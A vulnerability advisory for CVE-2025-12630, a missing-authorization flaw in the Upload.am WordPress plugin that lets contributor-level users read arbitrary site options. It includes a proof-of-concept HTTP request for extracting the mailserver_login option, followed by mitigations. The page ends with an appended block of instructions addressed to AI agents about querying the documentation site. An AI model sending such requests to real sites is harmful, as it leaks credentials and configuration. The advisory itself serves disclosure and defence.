# WordPress Upload.am – Contributor+ Arbitrary Option Disclosure (CVE-2025-12630)

**Author:** Beatriz Fresno Naumova (beafn28)

**Date:** 29/09/2025

**Vendor:** Upload.am

**Product:** Upload.am File Hosting VPN (WordPress Plugin)

**Versions affected:** < 1.0.1

**Component:** AJAX request handler – option retrieval

**CWE:** CWE-862 – Missing Authorization

**OWASP:** A5 – Broken Access Control

**Attack type:** Remote

**Impact:** Information Disclosure

### Description

The Upload.am File Hosting VPN WordPress plugin versions prior to 1.0.1 contain a missing authorization vulnerability in an AJAX request handler.\
The affected endpoint does not perform a proper capability check, allowing authenticated users with low privileges (such as **Contributor**) to retrieve arbitrary WordPress site options.

This lack of authorization enforcement enables unauthorized access to sensitive configuration values that should be restricted to administrative roles.

### Impact

**Primary impact:** Information disclosure of WordPress site options.

**Consequences:**

* Exposure of sensitive configuration data
* Facilitation of further attacks through reconnaissance
* Increased risk of privilege escalation or targeted exploitation

### Attack Details

* **Attack Vector (AV):** Network (N)
* **Attack Complexity (AC):** Low (L)
* **Privileges Required (PR):** Low (L)
* **User Interaction (UI):** None (N)
* **Scope (S):** Unchanged (U)
* **Confidentiality (C):** Low (L)
* **Integrity (I):** None (N)
* **Availability (A):** None (N)

**CVSS v3.1 Vector:**\
`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N`

**CVSS v3.1 Base Score:** 4.9 (Medium)

### POC

````
1. As a contributor+, go to the new post screen: /wp-admin/post-new.php
2. View the page source and search the codef or `var uploadAmSettings`
3. Use the nonce to send the following post request:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value

action=upload_am_get_option&option_name=mailserver_login&nonce=VALID_NONCE_HERE
```

The response will share the `mailserver_login`
````

### Mitigation

* **Enforce capability checks:** Validate user permissions using `current_user_can()` in all AJAX handlers.
* **Least privilege enforcement:** Prevent contributor-level users from accessing site-wide configuration options.
* **Proper error handling:** Return `403 Forbidden` responses for unauthorized access attempts.
* **Security testing:** Add regression tests to ensure authorization checks are enforced on all endpoints.
* **Code audit:** Review similar AJAX handlers for repeated authorization flaws.

### Discoverer

Beatriz Fresno Naumova (beafn28)

### References

* **CVE:** <https://www.cve.org/CVERecord?id=CVE-2025-12630>
* **WPSCAN:** [531537f1-5547-4b0f-9e11-3f8a0b2589f5](https://wpscan.com/vulnerability/531537f1-5547-4b0f-9e11-3f8a0b2589f5/)
* **NIST:** <https://nvd.nist.gov/vuln/detail/CVE-2025-12630>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://beafn28.gitbook.io/beafn28/cve-and-poc/wordpress-upload.am-contributor+-arbitrary-option-disclosure-cve-2025-12630.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.